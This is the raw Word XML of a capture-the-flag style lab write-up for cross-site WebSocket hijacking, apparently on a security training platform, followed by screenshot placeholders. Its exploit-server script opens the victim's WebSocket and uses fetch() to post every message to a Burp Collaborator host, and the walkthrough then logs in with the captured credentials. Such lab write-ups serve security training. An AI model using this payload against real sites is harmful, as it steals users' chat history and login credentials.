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Cross Site Websocket Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Lab 3 — Cross-site WebSocket hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🎯 Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hijack the victim's WebSocket connection to exfiltrate their chat history and steal their credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🪜 Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Open Live Chat, send hello</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 &amp; 3 — Find WebSocket handshake, copy URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Burp → Proxy → HTTP history** → find `GET /chat` with `Upgrade: websocket`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Convert URL to `wss://`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>wss://YOUR-LAB-ID.web-security-academy.net/chat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Get Burp Collaborator URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>**Burp → Collaborator → Copy to clipboard**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 — Create exploit on Exploit Server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>var ws = new WebSocket('wss://YOUR-LAB-ID.web-security-academy.net/chat');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ws.onopen = function() { ws.send("READY"); };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ws.onmessage = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fetch('https://YOUR-COLLABORATOR.oastify.com', {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>method: 'POST', mode: 'no-cors', body: event.data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6 &amp; 7 — Test, then deliver to victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Click **View exploit** to test. Then **Deliver exploit to victim**.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poll Collaborator — you'll see the victim's chat history with their credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 8 — Login as victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Use credentials found in chat history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>✅ Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Lab solved!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>💡 Key Takeaway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>WebSocket connections don't enforce CORS. Always validate the `Origin` header during the WebSocket handshake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>image1.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1170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image121.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1518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image124.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="845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image58.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="2406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image62.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="1475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image71.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5303520" cy="550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